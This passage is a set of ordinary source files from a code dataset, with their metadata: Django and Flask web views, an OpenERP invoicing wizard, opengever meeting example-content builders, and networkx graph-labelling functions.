dict(\n page=page,\n )\n template = \"core/about.html\"\n return render(request, template, context)\n\n\ndef about_aikido(request):\n page = get_object_or_404(Page, slug='sobre-o-aikido')\n context = dict(\n page=page,\n )\n template = \"core/about.html\"\n return render(request, template, context)\n\n", "sub_path": "aikidoleoni/core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1516, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 8, "usage_type": "call"}, {"api_name": "aikidoleoni.core.models.Page", "line_number": 8, "usage_type": "argument"}, {"api_name": "aikidoleoni.blog.models.Post.published_posts.all", "line_number": 11, "usage_type": "call"}, {"api_name": "aikidoleoni.blog.models.Post.published_posts", "line_number": 11, "usage_type": "attribute"}, {"api_name": "aikidoleoni.blog.models.Post", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 13, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 17, "usage_type": "call"}, {"api_name": 
"aikidoleoni.core.models.Page", "line_number": 17, "usage_type": "argument"}, {"api_name": "aikidoleoni.core.forms.ContactForm", "line_number": 20, "usage_type": "call"}, {"api_name": "aikidoleoni.core.forms.ContactForm", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 40, "usage_type": "call"}, {"api_name": "aikidoleoni.core.models.Page", "line_number": 40, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 49, "usage_type": "call"}, {"api_name": "aikidoleoni.core.models.Page", "line_number": 49, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "95988008", "text": "import time\r\nfrom openerp.osv import fields, osv\r\nfrom openerp.tools.translate import _\r\nimport logging\r\n_logger = logging.getLogger(__name__)\r\n\r\nclass dincelsale_order_balance_inv(osv.osv_memory):\r\n\t_name = \"dincelsale.order.balance\"\r\n\t_columns = {\r\n\t\t'date': fields.date('Date'),\r\n\t\t'qty':fields.float(\"Qty test\"),\r\n\t\t'comments':fields.char(\"Comments\"),\r\n\t\t'order_id':fields.many2one('sale.order', 'OrderId'),\r\n\t\t'amount':fields.float('Amount Ex Gst'),\r\n\t\t'amount_total':fields.float('Amount Total'),\r\n\t}\r\n\t\t\r\n\tdef on_change_amount(self, cr, uid, ids,_amounttot, context=None):\r\n\t\tamount= float(_amounttot)/1.1\r\n\t\tvals={'amount':amount}\t\r\n\r\n\t\treturn {'value':vals}\r\n\t\t\r\n\tdef button_create_balance1(self, cr, uid, ids, context=None):\r\n\t\tif context is None:\r\n\t\t\tcontext = {}\t\t\t\r\n\t\tfor record in self.browse(cr, uid, ids, context=context):\t\t\r\n\t\t\tif not record.amount or record.amount<=0.0:\r\n\t\t\t\traise osv.except_osv(_('Error!'),_('Invalid amount found!!'))\r\n\t\t\telse:\r\n\t\t\t\tprice_unit\t= record.amount# float(record.amount_total)/1.1\r\n\t\t\t\tobj_inv \t= self.pool.get('account.invoice')\t\r\n\t\t\t\tobj_invline\t= self.pool.get('account.invoice.line')\r\n\t\t\t\tproduct_obj = self.pool.get('product.product')\t\r\n\t\t\t\targs = [(\"x_prod_cat\", \"=\", \"balance1\")]\r\n\t\t\t\t_ids = product_obj.search(cr, uid, args, context=context) \r\n\t\t\t\tif not _ids:\r\n\t\t\t\t\traise osv.except_osv(_('Error!'),_('Balance product not found!!'))\r\n\t\t\t\telse:\r\n\t\t\t\t\tproduct_id\t = _ids[0]\r\n\t\t\t\t\t_obj = product_obj.browse(cr, uid, product_id, context)\r\n\t\t\t\t\tvals = {\r\n\t\t\t\t\t\t'x_sale_order_id': record.order_id.id,\r\n\t\t\t\t\t\t'x_inv_type':'balance',\r\n\t\t\t\t\t\t'origin': record.order_id.name,\r\n\t\t\t\t\t\t'reference': record.order_id.name,\r\n\t\t\t\t\t\t'partner_id': record.order_id.partner_id.id,\r\n\t\t\t\t\t\t'user_id':record.order_id.user_id.id,\r\n\t\t\t\t\t\t#'internal_number': record.name,\r\n\t\t\t\t\t\t'section_id': 1,\r\n\t\t\t\t\t\t'type': 'out_invoice',\r\n\t\t\t\t\t\t'account_id':record.order_id.partner_id.property_account_receivable.id\r\n\t\t\t\t\t\t}\r\n\t\t\t\r\n\t\t\t\t\tvals['date_invoice']=record.date\r\n\t\t\t\t\tvals['date_due']=vals['date_invoice']\r\n\t\t\t\t\t\r\n\t\t\t\t\t \r\n\t\t\t\t\tvals['x_project_id']=record.order_id.x_project_id.id\r\n\t\t\t\t \r\n\t\t\t\t\t_payterm = \tself.pool.get('account.payment.term').search(cr, uid, [('x_payterm_code', '=', 
'immediate')], limit=1)\r\n\t\t\t\t\tif _payterm:\r\n\t\t\t\t\t\tvals['payment_term']=_payterm[0]\t\r\n\t\t\t\t\t\r\n\t\t\t\t\tinv_id = obj_inv.create(cr, uid, vals, context=context)\r\n\t\t\t\t\r\n\t\t\t\t\tvals = {\r\n\t\t\t\t\t\t'product_id': product_id,\r\n\t\t\t\t\t\t'quantity': '1',\r\n\t\t\t\t\t\t'invoice_id': inv_id,\r\n\t\t\t\t\t\t'origin': record.order_id.name,\r\n\t\t\t\t\t\t'price_unit': price_unit,\r\n\t\t\t\t\t\t'price_subtotal': price_unit,\r\n\t\t\t\t\t}\r\n\t\t\t\t\tvals['name'] = _obj.name\r\n\t\t\t\t\t \r\n\t\t\t\t\tif _obj.taxes_id:\r\n\t\t\t\t\t\tvals['invoice_line_tax_id'] = [(6, 0, _obj.taxes_id.ids)]\r\n\t\t\t\t \r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\tobj_invline.create(cr, uid, vals, context=context)\r\n\t\t\t\t\t#for taxes\r\n\t\t\t\t\t\r\n\t\t\t\t\tobj_inv = obj_inv.browse(cr, uid, inv_id, context)\r\n\t\t\t\t\tobj_inv.button_compute(True) #For taxes\r\n\t\t\t\t\t\r\n\t\t\t\t \r\n\t\t\t\t\tview_id = self.pool.get('ir.ui.view').search(cr, uid, [('name', '=', 'dincelaccount.invoice.form')], limit=1) \t\r\n\t\t\t\t\t\r\n\t\t\t\t\tvalue = {\r\n\t\t\t\t\t\t'domain': str([('id', 'in', inv_id)]),\r\n\t\t\t\t\t\t'view_type': 'form',\r\n\t\t\t\t\t\t'view_mode': 'form',\r\n\t\t\t\t\t\t'res_model': 'account.invoice',\r\n\t\t\t\t\t\t'view_id': view_id,\r\n\t\t\t\t\t\t'type': 'ir.actions.act_window',\r\n\t\t\t\t\t\t'name' : _('Invoice'),\r\n\t\t\t\t\t\t'res_id': inv_id\r\n\t\t\t\t\t}\r\n\t\t\t\t\treturn value\t\r\n\t\t\t\t\t\r\n\t\t#return True\r\n\t\t\r\n\tdef on_change_qty(self, cr, uid, ids, context=None):\r\n\t\t\r\n\t\t#if context and context.get('active_ids'):\r\n\t\t\t\r\n\t\tvals={}\t\r\n\r\n\t\treturn {'value':vals}\r\n\t\t\r\n\tdef _get_init_qty(self, cr, uid, context=None):\r\n\t\treturn 1\r\n\t\t\r\n\t_defaults = {\r\n\t\t'qty': _get_init_qty,\r\n\t\t'date': lambda *a: time.strftime('%Y-%m-%d'),\r\n\t\t}\r\n\t ", "sub_path": "dincelaccount/wizard/sale_order_balance_inv.py", "file_name": "sale_order_balance_inv.py", "file_ext": "py", "file_size_in_byte": 3705, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "openerp.osv.osv.osv_memory", "line_number": 7, "usage_type": "attribute"}, {"api_name": "openerp.osv.osv", "line_number": 7, "usage_type": "name"}, {"api_name": "openerp.osv.fields.date", "line_number": 10, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 10, "usage_type": "name"}, {"api_name": "openerp.osv.fields.float", "line_number": 11, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 11, "usage_type": "name"}, {"api_name": "openerp.osv.fields.char", "line_number": 12, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 12, "usage_type": "name"}, {"api_name": "openerp.osv.fields.many2one", "line_number": 13, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 13, "usage_type": "name"}, {"api_name": "openerp.osv.fields.float", "line_number": 14, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 14, "usage_type": "name"}, {"api_name": "openerp.osv.fields.float", "line_number": 15, "usage_type": "call"}, {"api_name": "openerp.osv.fields", "line_number": 15, "usage_type": "name"}, {"api_name": "openerp.osv.osv.except_osv", "line_number": 29, "usage_type": "call"}, {"api_name": "openerp.osv.osv", "line_number": 29, "usage_type": "name"}, {"api_name": "openerp.tools.translate._", "line_number": 29, "usage_type": 
"call"}, {"api_name": "openerp.osv.osv.except_osv", "line_number": 38, "usage_type": "call"}, {"api_name": "openerp.osv.osv", "line_number": 38, "usage_type": "name"}, {"api_name": "openerp.tools.translate._", "line_number": 38, "usage_type": "call"}, {"api_name": "openerp.tools.translate._", "line_number": 97, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 117, "usage_type": "call"}]} +{"seq_id": "48246118", "text": "from datetime import date\nfrom datetime import datetime\nfrom datetime import time\nfrom datetime import timedelta\nfrom ftw.builder import Builder\nfrom ftw.builder import create\nfrom ftw.builder import session\nfrom opengever.base.model import create_session\nfrom opengever.ogds.base.utils import get_current_admin_unit\nfrom opengever.testing import assets\nfrom opengever.testing import builders # noqa\nfrom plone import api\nimport pytz\n\n\nclass MeetingExampleContentCreator(object):\n \"\"\"Setup SQL example content.\n\n Currently it is not possible to do this with ftw.inflator.\n\n \"\"\"\n tz = pytz.timezone('Europe/Zurich')\n\n def __init__(self, site):\n self.site = site\n self.db_session = create_session()\n self.setup_builders()\n self.committee_law = self.site['sitzungen']['committee-1']\n self.committee_law_model = self.committee_law.load_model()\n\n self.committee_accounting = self.site['sitzungen']['committee-2']\n self.committee_accounting_model = self.committee_accounting.load_model()\n\n self.committee_assembly = self.site['sitzungen']['committee-3']\n self.committee_assembly_model = self.committee_assembly.load_model()\n\n self.committee_evil = self.site['sitzungen']['evil-committee-1']\n self.committee_evil_model = self.committee_evil.load_model()\n\n self.dossier_taxes_1 = self.site.restrictedTraverse(\n 'ordnungssystem/ressourcen-und-support/finanzen/planung/finanzplanung/dossier-5')\n self.dossier_taxes_2 = self.site.restrictedTraverse(\n 'ordnungssystem/ressourcen-und-support/finanzen/planung/finanzplanung/dossier-6')\n self.dossier_equipment = self.site.restrictedTraverse(\n 'ordnungssystem/ressourcen-und-support/finanzen/planung/investitionsplanung/dossier-7')\n\n self.dossier_baufrau = self.site.restrictedTraverse(\n 'ordnungssystem/ressourcen-und-support/personal/personalrekrutierung/dossier-5')\n self.dossier_laws_1 = self.site.restrictedTraverse(\n 'ordnungssystem/bevoelkerung-und-sicherheit/einwohnerkontrolle/dossier-1')\n self.dossier_laws_2 = self.site.restrictedTraverse(\n 'ordnungssystem/bevoelkerung-und-sicherheit/einwohnerkontrolle/dossier-2')\n self.repository_folder_meeting_word = self.site.restrictedTraverse(\n 'ordnungssystem/fuehrung/gemeinderecht')\n\n self.document_baufrau_1 = self.dossier_baufrau['document-2']\n self.document_baufrau_2 = self.dossier_baufrau['document-3']\n self.document_baufrau_3 = self.dossier_baufrau['document-4']\n\n self.document_taxes_1 = self.dossier_taxes_1['document-4']\n self.document_taxes_2 = self.dossier_taxes_1['document-5']\n self.document_taxes_3 = self.dossier_taxes_2['document-6']\n\n self.document_laws_1 = self.dossier_laws_1['document-4']\n self.document_laws_2 = self.dossier_laws_1['document-5']\n\n self.document_equipment_1 = self.dossier_equipment['document-7']\n self.document_equipment_2 = self.dossier_equipment['document-8']\n\n def setup_builders(self):\n session.current_session = session.BuilderSession()\n session.current_session.session = self.db_session\n\n def create_content(self):\n self.create_periods()\n self.create_members_and_memberships()\n 
self.create_meetings_word()\n self.create_proposals_word()\n\n def create_periods(self):\n create(Builder('period').having(\n start=date(2016, 1, 1),\n end=date(2016, 12, 31)).within(self.committee_law))\n create(Builder('period').having(\n start=date(2016, 1, 1),\n end=date(2016, 12, 31)).within(self.committee_accounting))\n create(Builder('period').having(\n start=date(2016, 1, 1),\n end=date(2016, 12, 31)).within(self.committee_assembly))\n create(Builder('period').having(\n start=date(2016, 1, 1),\n end=date(2016, 12, 31)).within(self.committee_evil))\n\n def create_members_and_memberships(self):\n peter = create(Builder('member')\n .having(firstname=u'Peter', lastname=u'M\\xfcller',\n admin_unit_id=get_current_admin_unit().id()))\n hans = create(Builder('member')\n .having(firstname=u'Hans', lastname=u'Meier',\n admin_unit_id=get_current_admin_unit().id()))\n\n for committee in [self.committee_law_model,\n self.committee_assembly_model]:\n create(Builder('membership')\n .having(committee=committee,\n member=peter,\n date_from=date.today(),\n date_to=date.today() + timedelta(days=512)))\n\n create(Builder('membership')\n .having(committee=committee,\n member=hans,\n date_from=date.today(),\n date_to=date.today() + timedelta(days=512)))\n\n def create_meetings_word(self):\n self.dossier_word, self.meeting_word = self.create_meeting_word(delta=1)\n\n # create future meetings\n for delta in [30, 60, 90, 120]:\n self.create_meeting_word(delta=delta)\n\n def create_meeting_word(self, delta):\n start = self.tz.localize(\n datetime.combine(date.today() + timedelta(days=delta), time(10, 0)))\n end = self.tz.localize(\n datetime.combine(date.today() + timedelta(days=delta), time(12, 0)))\n title = u\"Kommission f\\xfcr Rechtsfragen, {}\".format(\n api.portal.get_localized_time(datetime=start))\n\n dossier = create(Builder('meeting_dossier')\n .having(\n responsible=u'lukas.graf',\n title=u'Meeting {}'.format(\n api.portal.get_localized_time(start)),)\n .within(self.repository_folder_meeting_word))\n meeting = create(Builder('meeting')\n .having(title=title,\n committee=self.committee_law_model,\n location=u'Bern',\n start=start,\n end=end,)\n .link_with(dossier))\n return dossier, meeting\n\n def create_proposals_word(self):\n proposal1 = create(\n Builder('proposal')\n .within(self.dossier_baufrau)\n .having(committee=self.committee_law_model,\n title=u'Genehmigung der Anstellung von Hannah Baufrau als '\n u'Sachbearbeiterin einem Besch\\xe4ftigungsgrad von 90%')\n .relate_to(self.document_baufrau_1,\n self.document_baufrau_2,\n self.document_baufrau_3)\n .with_proposal_file(assets.load('vertragsentwurf.docx'))\n .as_submitted())\n self.meeting_word.schedule_proposal(proposal1.load_model())\n\n self.meeting_word.schedule_ad_hoc(\n u'Genehmigung der Bestellung von Hannah Baufrau als Sachbearbeterin '\n u'einem Besch\\xe4ftigungsgrad von 90%')\n\n create(\n Builder('proposal')\n .within(self.dossier_laws_1)\n .having(committee=self.committee_law_model,\n title=u'Revision der Rechtslage f\\xfcr eine Liberalisierung')\n .relate_to(self.document_laws_1, self.document_laws_2)\n .with_proposal_file(assets.load('vertragsentwurf.docx')))\n\n self.meeting_word.schedule_ad_hoc(\n u'Revision der Linkslage f\\xfcr eine Liberalisierung')\n", "sub_path": "opengever/examplecontent/meeting.py", "file_name": "meeting.py", "file_ext": "py", "file_size_in_byte": 7734, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pytz.timezone", 
"line_number": 22, "usage_type": "call"}, {"api_name": "opengever.base.model.create_session", "line_number": 26, "usage_type": "call"}, {"api_name": "ftw.builder.session.current_session", "line_number": 71, "usage_type": "attribute"}, {"api_name": "ftw.builder.session", "line_number": 71, "usage_type": "name"}, {"api_name": "ftw.builder.session.BuilderSession", "line_number": 71, "usage_type": "call"}, {"api_name": "ftw.builder.session.current_session", "line_number": 72, "usage_type": "attribute"}, {"api_name": "ftw.builder.session", "line_number": 72, "usage_type": "name"}, {"api_name": "ftw.builder.create", "line_number": 81, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 82, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 83, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 84, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 85, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 86, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 87, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 87, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 88, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 89, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 90, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 90, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 91, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 92, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 95, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 95, "usage_type": "call"}, {"api_name": "opengever.ogds.base.utils.get_current_admin_unit", "line_number": 97, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 98, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 98, "usage_type": "call"}, {"api_name": "opengever.ogds.base.utils.get_current_admin_unit", "line_number": 100, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 104, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 104, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 107, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 108, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 108, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 110, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 113, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 113, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 114, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 114, "usage_type": "call"}, {"api_name": "datetime.datetime.combine", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 125, "usage_type": "name"}, 
{"api_name": "datetime.date.today", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 125, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.datetime.combine", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 127, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 127, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 127, "usage_type": "call"}, {"api_name": "plone.api.portal.get_localized_time", "line_number": 129, "usage_type": "call"}, {"api_name": "plone.api.portal", "line_number": 129, "usage_type": "attribute"}, {"api_name": "plone.api", "line_number": 129, "usage_type": "name"}, {"api_name": "ftw.builder.create", "line_number": 131, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 131, "usage_type": "call"}, {"api_name": "plone.api.portal.get_localized_time", "line_number": 135, "usage_type": "call"}, {"api_name": "plone.api.portal", "line_number": 135, "usage_type": "attribute"}, {"api_name": "plone.api", "line_number": 135, "usage_type": "name"}, {"api_name": "ftw.builder.create", "line_number": 137, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 137, "usage_type": "call"}, {"api_name": "ftw.builder.create", "line_number": 147, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 148, "usage_type": "call"}, {"api_name": "opengever.testing.assets.load", "line_number": 156, "usage_type": "call"}, {"api_name": "opengever.testing.assets", "line_number": 156, "usage_type": "name"}, {"api_name": "ftw.builder.create", "line_number": 164, "usage_type": "call"}, {"api_name": "ftw.builder.Builder", "line_number": 165, "usage_type": "call"}, {"api_name": "opengever.testing.assets.load", "line_number": 170, "usage_type": "call"}, {"api_name": "opengever.testing.assets", "line_number": 170, "usage_type": "name"}]} +{"seq_id": "333618462", "text": "from flask import Flask, render_template, url_for, redirect, request, session\nimport utils\nimport auth\n\napp = Flask(__name__)\napp.secret_key = 'secretkey'\n\n@app.route(\"/\")\n@app.route(\"/home.html\")\ndef home():\n if 'username' in session:\n return render_template('home.html', username=session['username'])\n else:\n return render_template('home.html')\n\n@app.route(\"/login.html\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method==\"GET\":\n return render_template(\"login.html\")\n else:\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n if (auth.login(username,password)):\n session[\"username\"] = username\n return render_template('home.html', username=session['username'])\n else:\n return redirect(url_for(\"login\"))\n\n@app.route(\"/register.html\", methods=['GET', 'POST'])\ndef register():\n if request.method == \"GET\":\n return render_template(\"register.html\")\n else:\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n if auth.register(username,password):\n session['username'] = username\n return redirect(url_for('home'))\n else:\n return render_template(\"register.html\") #return specific error?\n\n@app.route(\"/portfolio\")\ndef portfolio():\n if 'username' in session:\n 
user = session['username']\n return render_template(\"portfolio.html\",username = user,cash=auth.getCash(user), stocks = auth.getStocks(user))\n else:\n return redirect(\"/register\")\n \n@app.route(\"/buynsell.html\", methods=['GET', 'POST'])\ndef buynsell():\n if request.method == \"GET\":\n if 'username' in session:\n return render_template(\"buynsell.html\", username = session['username'])\n else:\n return render_template('buynsell.html')\n else:\n symb = request.form['symbol']\n num = request.form['number']\n action = request.form['action']\n user = session['username']\n if action == 'buy':\n auth.buy(session['username'], symb, num)\n return redirect(\"/portfolio\")\n else:\n auth.sell(session['username'], symb, num)\n return redirect(\"/portfolio\")\n\n@app.route(\"/search.html\", methods=[\"GET\", \"POST\"])\ndef search():\n if request.method == \"GET\":\n if 'username' in session:\n return render_template(\"search.html\",username = session[\"username\"])\n else:\n return render_template(\"search.html\")\n else:\n symb = request.form['symb']\n q = utils.init(symb)\n if 'username' in session:\n return render_template(\"stocks.html\",username = session[\"username\"], q=q)\n else:\n return render_template(\"stocks.html\", q=q)\n\n@app.route(\"/logout.html\")\ndef logout():\n session.pop(\"username\", None)\n return redirect(url_for(\"home\"))\n \nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0',port=5000)\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3007, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 11, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 12, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "auth.login", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 35, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 35, "usage_type": 
"name"}, {"api_name": "auth.register", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 44, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 46, "usage_type": "call"}, {"api_name": "auth.getCash", "line_number": 46, "usage_type": "call"}, {"api_name": "auth.getStocks", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 61, "usage_type": "name"}, {"api_name": "auth.buy", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 64, "usage_type": "call"}, {"api_name": "auth.sell", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 71, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 71, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "utils.init", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.session.pop", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "635620326", "text": 
"import csv\nimport networkx as nx\n\ndef Extract_Global_High_Neighbor(G, heigh_neighbour, s=0):\n '''\n :param G: original graph\n :param heigh_neighbour: the first x heigh degree nodes\n :return: G with label 1 (Global_High_Neighbor)\n '''\n nodes_num = round(heigh_neighbour * len(G))\n node_degree = [[n, d] for n, d in G.degree()]\n sort_node_degree = sorted(node_degree, key=lambda tup: tup[1], reverse=True)[:nodes_num]\n\n hubs = []\n for i in sort_node_degree:\n hubs.append(i[0])\n\n new_node = 0\n for node in hubs:\n if G.node[node]['global'] == 0:\n G.node[node]['global'] = 1\n new_node += 1\n else:\n G.node[node]['global'] = 2\n\n if s == 1:\n for n, data in G.nodes(data='global'):\n if data == 1 and n not in hubs:\n G.node[n]['global'] = 0\n\n print(\"heigh_hubs : %d\" % len(sort_node_degree))\n if s == 1:\n print(\"heigh_hubs new : %d\" % new_node)\n return(len(sort_node_degree), new_node)\n else:\n return (len(sort_node_degree))\n # return(G)\n\n# Extract the star structure in the graph\ndef Extract_Star(G, threshold, s=0):\n '''\n :param G: original graph\n :return: G with label 1 (Star)\n '''\n\n # find star\n star = []\n star_num = {}\n star_threshold = threshold\n flag = 0\n node_sort = sorted(list(G.nodes()))\n for node in node_sort:\n # find nodes's neighbor\n node_neighbor = list(G.neighbors(node))\n if len(node_neighbor) > star_threshold:\n for node1 in node_neighbor:\n flag = 1\n node1_neighbor = list(G.neighbors(node1))\n\n list1 = list(set(node_neighbor) & set(node1_neighbor))\n\n if len(list1) != 0:\n flag = 0\n break\n if flag == 1:\n star.append(node)\n star_num[node] = len(node_neighbor)\n else:\n continue\n\n new_node = 0\n for n in star:\n if G.node[n]['star'] == 0:\n G.node[n]['star'] = 1\n new_node += 1\n else:\n G.node[n]['star'] = 2\n\n if s == 1:\n for n, data in G.nodes(data='star'):\n if data == 1 and n not in star:\n G.node[n]['star'] = 0\n\n\n print(\"heigh_star : %d\" % len(star))\n if s == 1:\n print(\"heigh_star new : %d\" % new_node)\n return(len(star), new_node)\n else:\n return(len(star))\n # return(G)\n\n\n# load graph to networkx\ndef loadData(path1, path2, isDirect):\n\n # add 